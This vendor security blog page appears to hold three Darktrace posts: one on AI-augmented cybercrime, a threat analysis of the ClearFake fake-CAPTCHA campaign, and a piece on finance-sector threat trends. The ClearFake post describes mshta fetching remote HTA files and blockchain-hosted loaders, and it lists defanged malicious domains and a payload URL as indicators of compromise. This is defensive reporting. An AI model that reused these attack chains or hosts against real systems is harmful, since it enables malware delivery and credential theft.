ブログ
/
AI
/
March 7, 2024

Defending Against the New Normal in Cybercrime: AI

This blog outlines research & data points on the evolving threat landscape, the impact of malicious AI, and why proactive cyber readiness is essential.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
07
Mar 2024

AI in Cyber Security

Over the last 18 months, discussions about artificial intelligence (AI) – specifically generative AI – ranged from excitement and optimism about its transformative potential to fear and uncertainty about the new risks it introduces.  

New research1 commissioned by Darktrace shows that 89 percent of IT security teams polled globally believe AI-augmented cyber threats will have a significant impact on their organization within the next two years, yet 60 percent believe they are currently unprepared to defend against these attacks. Their concerns include increased volume and sophistication of malware that targets known vulnerabilities and increased exposure of sensitive or proprietary information from using generative AI tools.  

At Darktrace, we monitor trends across our global customer base to understand how the challenges facing security teams are evolving alongside industry advancements in AI. We’ve observed that AI, automation, and cybercrime-as-a-service have increased the speed, sophistication and efficacy of cyber security attacks.  

How AI Impacts Phishing Attempts

Darktrace has observed immediate impacts on phishing, which remains one of the most common forms of attack. In April 2023, Darktrace shared research that found a 135 percent increase in ‘novel social engineering attacks’ in the first two months of 2023, corresponding with the widespread adoption of ChatGPT2. These phishing attacks showed a strong linguistic deviation – semantically and syntactically – compared to other phishing emails, which suggested to us that generative AI is providing an avenue for threat actors to craft sophisticated and targeted attacks at speed and scale. A year later, we’ve seen this trend continue. Darktrace customers received approximately 2,867,000 phishing emails in December 2023 alone, a 14 percent increase on what was observed months prior in September3. Between September and December 2023, phishing attacks that used novel social engineering techniques grew by 35 percent on average across the Darktrace customer base4.  

These observations reinforce trends that others in the industry have shared. For example, Microsoft and OpenAI recently published research on tactics, techniques, and procedures (TTPs) augmented by large language models (LLMs) that they have observed nation-state threat actors using. That includes using LLMs to draft and generate social engineering attacks, inform reconnaissance, assist with vulnerability research and more.  

The Rise of Cybercrime-as-as-a-Service

The increasing cyber challenge facing defenders cannot be attributed to AI alone. The rise of cybercrime as-a-service is also changing the dynamic. Darktrace’s 2023 End of Year Threat Report found that cybercrime-as-a-service continue to dominate the threat landscape, with malware-as-a-Service (MaaS) and ransomware-as-a-Service (RaaS) tools making up most malicious tools in use by attackers. The as-a-Service ecosystem can provide attackers with everything from pre-made malware to templates for phishing emails, payment processing systems and even helplines to enable bad actors to mount attacks with limited technical knowledge.  

These trends make it clear that attackers now have a more widely accessible toolbox that reduces their barriers.

AI Enabling Accidental Insider Threats

However, the new risks facing businesses aren’t from external threat actors alone. Use of generative AI tools within the enterprise introduces a new category of accidental insider threats. Employees using generative AI tools now have easier access to more organizational data than ever before. Even the most well-intentioned employee could unintentionally leak or access restricted, sensitive data via these tools. In the second half of 2023, we observed that approximately half of Darktrace customers had employees accessing generative AI services. As this continues to increase, organizations need policies in place to guide the use cases for generative AI tools as well as strong data governance and the ability to enforce these policies to minimize risk.  

It is inevitable that AI will increase the risks and threats facing an organization, but this is not an unsolvable challenge from a defensive perspective. While advancements in generative AI may be worsening issues like novel social engineering and creating new types of accidental insider threats, AI itself offers a strong defense.  

The Shift to Proactive Cyber Readiness

According to the World Economic Forum’s Global Cybersecurity Outlook 2024, the number of organizations that “maintain minimum viable cyber resilience is down 30 percent compared to 2023”, and “while large organizations have demonstrated gains in cyber resilience, small and medium-sized companies showed significant decline.” The importance of cyber resilience cannot be understated in the face of today’s increasingly as-a-service, automated, and AI-augmented threat landscape.  

Historically, organizations wait for incidents to happen and rely on known attack data for threat detection and response, making it nearly impossible to identify never-before-seen threats. The traditional security stack has also relied heavily on point solutions focused on protecting different pieces of the digital environment, with individual tools for endpoint, email, network, on-premises data centers, SaaS applications, cloud, OT and beyond. These point solutions fail to correlate disparate incidents to form a complete picture of an orchestrated attack. Even with the addition of tools that can stitch together events from across the enterprise, they are in a reactive state that focuses heavily on threat detection and response.  

Organizations need to evolve from a reactive posture to a stance of proactive cyber readiness. To do so, they need an approach that proactively identifies internal and external vulnerabilities, identifies gaps in security policy and process before an attack occurs, breaks down silos to investigate all threats (known and unknown) during an attack, and uplifts the human analyst beyond menial tasks to incident validation and recovery after an attack.  

AI can help break down silos within the SOC and provide a more proactive approach to scale up and augment defenders. It provides richer context when it is fed information from multiple systems, data sets, and tools within the stack and can build an in-depth, real-time behavioural understanding of a business that humans alone cannot.

Lessons From AI in the SOC

At Darktrace, we’ve been applying AI to the challenge of cyber security for more than ten years, and we know that proactive cyber readiness requires the right mix of people, process, and technology.  

When the right AI is applied responsibly to the right cyber security challenge, the impact on both the human security team and the business is profound.

AI can bring machine speed and scale to some of the most time-intensive, error-prone, and psychologically draining components of cyber security, helping humans focus on the value-added work that only they can provide. Incident response and continuous monitoring are two areas where AI has already been proven to effectively augment defenders. For example, a civil engineering company used Darktrace’s AI to uplift its SOC team from the repetitive, manual tasks of analyzing and responding to email incidents. The analysts estimated they were each spending 10 hours per week on email incident analysis. With AI autonomously analyzing and responding to email incidents, the analysts could gain approximately 20 percent of their time back to focus on proactive cyber security measures

An effective human-AI partnership is key to proactive cyber readiness and can directly benefit the work-life of defenders. It can help to reduce burnout, support data-driven decision-making, and reduce the reliance on hard-to-find, specialized talent that has created a skills shortage in cyber security for many years. Most importantly, AI can free up team members to focus on more meaningful tasks, such as compliance initiatives, user education, and sophisticated threat hunting.  

Advancements in AI are happening at a rapid pace. As we’ve already observed, attackers will be watching these developments and looking for ways to use it to their advantage. Luckily, AI has already proved to be an asset for defenders, and embracing a proactive approach to cyber resilience can help organizations increase their readiness for this next phase. Prioritizing cyber security will be an enabler of innovation and progress as AI development continues.  

--

Join Darktrace on 9 April for a virtual event to explore the latest innovations needed to get ahead of the rapidly evolving threat landscape. Register today to hear more about our latest innovations coming to Darktrace’s offerings.

References

[1] The survey was undertaken by AimPoint Group & Dynata on behalf Darktrace between December 2023 & January 2024. The research polled 1773 security professionals in positions across the security team from junior roles to CISOs, across 14 countries – Australia, Brazil, France, Germany, Italy, Japan, Mexico, Netherlands, Singapore, Spain, Sweden, UAE, UK, and USA.

[2] Based on the average change in email attacks between January and February 2023 detected across Darktrace/Email deployments with control of outliers.

[3] Average calculated across Darktrace customers from 31st August to 21st December.

[4] Average calculated across Darktrace customers from 31st August to 21st December. Novel social engineering attacks use linguistic techniques that are different to techniques used in the past, as measured by a combination of semantics, phrasing, text volume, punctuation, and sentence length.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO

More in this series

No items found.

Blog

/

Endpoint

/

January 30, 2026

ClearFake: From Fake CAPTCHAs to Blockchain-Driven Payload Retrieval

Default blog imageDefault blog image

What is ClearFake?

As threat actors evolve their techniques to exploit victims and breach target networks, the ClearFake campaign has emerged as a significant illustration of this continued adaptation. ClearFake is a campaign observed using a malicious JavaScript framework deployed on compromised websites, impacting sectors such as e‑commerce, travel, and automotive. First identified in mid‑2023, ClearFake is frequently leveraged to socially engineer victims into installing fake web browser updates.

In ClearFake compromises, victims are steered toward compromised WordPress sites, often positioned by attackers through search engine optimization (SEO) poisoning. Once on the site, users are presented with a fake CAPTCHA. This counterfeit challenge is designed to appear legitimate while enabling the execution of malicious code. When a victim interacts with the CAPTCHA, a PowerShell command containing a download string is retrieved and executed.

Attackers commonly abuse the legitimate Microsoft HTML Application Host (MSHTA) in these operations. Recent campaigns have also incorporated Smart Chain endpoints, such as “bsc-dataseed.binance[.]org,” to obtain configuration code. The primary payload delivered through ClearFake is typically an information stealer, such as Lumma Stealer, enabling credential theft, data exfiltration, and persistent access [1].

Darktrace’s Coverage of ClearFake

Darktrace / ENDPOINT first detected activity likely associated with ClearFake on a single device on over the course of one day on November 18, 2025. The system observed the execution of “mshta.exe,” the legitimate Microsoft HTML Application Host utility. It also noted a repeated process command referencing “weiss.neighb0rrol1[.]ru”, indicating suspicious external activity. Subsequent analysis of this endpoint using open‑source intelligence (OSINT) indicated that it was a malicious, domain generation algorithm (DGA) endpoint [2].

The process line referencing weiss.neighb0rrol1[.]ru, as observed by Darktrace / ENDPOINT.
Figure 1: The process line referencing weiss.neighb0rrol1[.]ru, as observed by Darktrace / ENDPOINT.

This activity indicates that mshta.exe was used to contact a remote server, “weiss.neighb0rrol1[.]ru/rpxacc64mshta,” and execute the associated HTA file to initiate the next stage of the attack. OSINT sources have since heavily flagged this server as potentially malicious [3].

The first argument in this process uses the MSHTA utility to execute the HTA file hosted on the remote server. If successful, MSHTA would then run JavaScript or VBScript to launch PowerShell commands used to retrieve malicious payloads, a technique observed in previous ClearFake campaigns. Darktrace also detected unusual activity involving additional Microsoft executables, including “winlogon.exe,” “userinit.exe,” and “explorer.exe.” Although these binaries are legitimate components of the Windows operating system, threat actors can abuse their normal behavior within the Windows login sequence to gain control over user sessions, similar to the misuse of mshta.exe.

EtherHiding cover

Darktrace also identified additional ClearFake‑related activity, specifically a connection to bsc-testnet.drpc[.]org, a legitimate BNB Smart Chain endpoint. This activity was triggered by injected JavaScript on the compromised site www.allstarsuae[.]com, where the script initiated an eth_call POST request to the Smart Chain endpoint.

Example of a fake CAPTCHA on the compromised site www.allstarsuae[.]com.
Figure 2: Example of a fake CAPTCHA on the compromised site www.allstarsuae[.]com.

EtherHiding is a technique in which threat actors leverage blockchain technology, specifically smart contracts, as part of their malicious infrastructure. Because blockchain is anonymous, decentralized, and highly persistent, it provides threat actors with advantages in evading defensive measures and traditional tracking [4].

In this case, when a user visits a compromised WordPress site, injected base64‑encoded JavaScript retrieved an ABI string, which was then used to load and execute a contract hosted on the BNB Smart Chain.

JavaScript hosted on the compromised site www.allstaruae[.]com.
Figure 3: JavaScript hosted on the compromised site www.allstaruae[.]com.

Conducting malware analysis on this instance, the Base64 decoded into a JavaScript loader. A POST request to bsc-testnet.drpc[.]org was then used to retrieve a hex‑encoded ABI string that loads and executes the contract. The JavaScript also contained hex and Base64‑encoded functions that decoded into additional JavaScript, which attempted to retrieve a payload hosted on GitHub at “github[.]com/PrivateC0de/obf/main/payload.txt.” However, this payload was unavailable at the time of analysis.

Darktrace’s detection of the POST request to bsc-testnet.drpc[.]org.
Figure 4: Darktrace’s detection of the POST request to bsc-testnet.drpc[.]org.
Figure 5: Darktrace’s detection of the executable file and the malicious hostname.

Autonomous Response

As Darktrace’s Autonomous Response capability was enabled on this customer’s network, Darktrace was able to take swift mitigative action to contain the ClearFake‑related activity early, before it could lead to potential payload delivery. The affected device was blocked from making external connections to a number of suspicious endpoints, including 188.114.96[.]6, *.neighb0rrol1[.]ru, and neighb0rrol1[.]ru, ensuring that no further malicious connections could be made and no payloads could be retrieved.

Autonomous Response also acted to prevent the executable mshta.exe from initiating HTA file execution over HTTPS from this endpoint by blocking the attempted connections. Had these files executed successfully, the attack would likely have resulted in the retrieval of an information stealer, such as Lumma Stealer.

Autonomous Response’s intervention against the suspicious connectivity observed.
Figure 6: Autonomous Response’s intervention against the suspicious connectivity observed.

Conclusion

ClearFake continues to be observed across multiple sectors, but Darktrace remains well‑positioned to counter such threats. Because ClearFake’s end goal is often to deliver malware such as information stealers and malware loaders, early disruption is critical to preventing compromise. Users should remain aware of this activity and vigilant regarding fake CAPTCHA pop‑ups. They should also monitor unusual usage of MSHTA and outbound connections to domains that mimic formats such as “bsc-dataseed.binance[.]org” [1].

In this case, Darktrace was able to contain the attack before it could successfully escalate and execute. The attempted execution of HTA files was detected early, allowing Autonomous Response to intervene, stopping the activity from progressing. As soon as the device began communicating with weiss.neighb0rrol1[.]ru, an Autonomous Response inhibitor triggered and interrupted the connections.

As ClearFake continues to rise, users should stay alert to social engineering techniques, including ClickFix, that rely on deceptive security prompts.

Credit to Vivek Rajan (Senior Cyber Analyst) and Tara Gould (Malware Research Lead)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Darktrace Model Detections

Process / New Executable Launched

Endpoint / Anomalous Use of Scripting Process

Endpoint / New Suspicious Executable Launched

Endpoint / Process Connection::Unusual Connection from New Process

Autonomous Response Models

Antigena / Network::Significant Anomaly::Antigena Significant Anomaly from Client Block

List of Indicators of Compromise (IoCs)

  • weiss.neighb0rrol1[.]ru – URL - Malicious Domain
  • 188.114.96[.]6 – IP – Suspicious Domain
  • *.neighb0rrol1[.]ru – URL – Malicious Domain

MITRE Tactics

Initial Access, Drive-by Compromise, T1189

User Execution, Execution, T1204

Software Deployment Tools, Execution and Lateral Movement, T1072

Command and Scripting Interpreter, T1059

System Binary Proxy Execution: MSHTA, T1218.005

References

1.        https://www.kroll.com/en/publications/cyber/rapid-evolution-of-clearfake-delivery

2.        https://www.virustotal.com/gui/domain/weiss.neighb0rrol1.ru

3.        https://www.virustotal.com/gui/file/1f1aabe87e5e93a8fff769bf3614dd559c51c80fc045e11868f3843d9a004d1e/community

4.        https://www.packetlabs.net/posts/etherhiding-a-new-tactic-for-hiding-malware-on-the-blockchain/

Continue reading
About the author
Vivek Rajan
Cyber Analyst

Blog

/

Network

/

January 30, 2026

The State of Cybersecurity in the Finance Sector: Six Trends to Watch

Default blog imageDefault blog image

The evolving cybersecurity threat landscape in finance

The financial sector, encompassing commercial banks, credit unions, financial services providers, and cryptocurrency platforms, faces an increasingly complex and aggressive cyber threat landscape. The financial sector’s reliance on digital infrastructure and its role in managing high-value transactions make it a prime target for both financially motivated and state-sponsored threat actors.

Darktrace’s latest threat research, The State of Cybersecurity in the Finance Sector, draws on a combination of Darktrace telemetry data from real-world customer environments, open-source intelligence, and direct interviews with financial-sector CISOs to provide perspective on how attacks are unfolding and how defenders in the sector need to adapt.  

Six cybersecurity trends in the finance sector for 2026

1. Credential-driven attacks are surging

Phishing continues to be a leading initial access vector for attacks targeting confidentiality. Financial institutions are frequently targeted with phishing emails designed to harvest login credentials. Techniques including Adversary-in-The-Middle (AiTM) to bypass Multi-factor Authentication (MFA) and QR code phishing (“quishing”) are surging and are capable of fooling even trained users. In the first half of 2025, Darktrace observed 2.4 million phishing emails within financial sector customer deployments, with almost 30% targeted towards VIP users.  

2. Data Loss Prevention is an increasing challenge

Compliance issues – particularly data loss prevention -- remain a persistent risk. In October 2025 alone, Darktrace observed over 214,000 emails across financial sector customers that contained unfamiliar attachments and were sent to suspected personal email addresses highlighting clear concerns around data loss prevention. Across the same set of customers within the same time frame, more than 351,000 emails containing unfamiliar attachments were sent to freemail addresses (e.g. gmail, yahoo, icloud), highlighting clear concerns around DLP.  

Confidentiality remains a primary concern for financial institutions as attackers increasingly target sensitive customer data, financial records, and internal communications.  

3. Ransomware is evolving toward data theft and extortion

Ransomware is no longer just about locking systems, it’s about stealing data first and encrypting second. Groups such as Cl0p and RansomHub now prioritize exploiting trusted file-transfer platforms to exfiltrate sensitive data before encryption, maximizing regulatory and reputational fallout for victims.  

Darktrace’s threat research identified routine scanning and malicious activity targeting internet-facing file-transfer systems used heavily by financial institutions. In one notable case involving Fortra GoAnywhere MFT, Darktrace detected malicious exploitation behavior six days before the CVE was publicly disclosed, demonstrating how attackers often operate ahead of patch cycles

This evolution underscores a critical reality: by the time a vulnerability is disclosed publicly, it may already be actively exploited.

4. Attackers are exploiting edge devices, often pre-disclosure.  

VPNs, firewalls, and remote access gateways have become high-value targets, and attackers are increasingly exploiting them before vulnerabilities are publicly disclosed. Darktrace observed pre-CVE exploitation activity affecting edge technologies including Citrix, Palo Alto, and Ivanti, enabling session hijacking, credential harvesting, and privileged lateral movement into core banking systems.  

Once compromised, these edge devices allow adversaries to blend into trusted network traffic, bypassing traditional perimeter defenses. CISOs interviewed for the report repeatedly described VPN infrastructure as a “concentrated focal point” for attackers, especially when patching and segmentation lag behind operational demands.

5. DPRK-linked activity is growing across crypto and fintech.  

State-sponsored activity, particularly from DPRK-linked groups affiliated with Lazarus, continues to intensify across cryptocurrency and fintech organizations. Darktrace identified coordinated campaigns leveraging malicious npm packages, previously undocumented BeaverTail and InvisibleFerret malware, and exploitation of React2Shell (CVE-2025-55182) for credential theft and persistent backdoor access.  

Targeting was observed across the United Kingdom, Spain, Portugal, Sweden, Chile, Nigeria, Kenya, and Qatar, highlighting the global scope of these operations.  

6. Cloud complexity and AI governance gaps are now systemic risks.  

Finally, CISOs consistently pointed to cloud complexity, insider risk from new hires, and ungoverned AI usage exposing sensitive data as systemic challenges. Leaders emphasized difficulty maintaining visibility across multi-cloud environments while managing sensitive data exposure through emerging AI tools.  

Rapid AI adoption without clear guardrails has introduced new confidentiality and compliance risks, turning governance into a board-level concern rather than a purely technical one.

Building cyber resilience in a shifting threat landscape

The financial sector remains a prime target for both financially motivated and state-sponsored adversaries. What this research makes clear is that yesterday’s security assumptions no longer hold. Identity attacks, pre-disclosure exploitation, and data-first ransomware require adaptive, behavior-based defenses that can detect threats as they emerge, often ahead of public disclosure.

As financial institutions continue to digitize, resilience will depend on visibility across identity, edge, cloud, and data, combined with AI-driven defense that learns at machine speed.  

Learn more about the threats facing the finance sector, and what your organization can do to keep up in The State of Cybersecurity in the Finance Sector report here.  

Acknowledgements:

The State of Cybersecurity in the Finance sector report was authored by Calum Hall, Hugh Turnbull, Parvatha Ananthakannan, Tiana Kelly, and Vivek Rajan, with contributions from Emma Foulger, Nicole Wong, Ryan Traill, Tara Gould, and the Darktrace Threat Research and Incident Management teams.

[related-resource]  

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ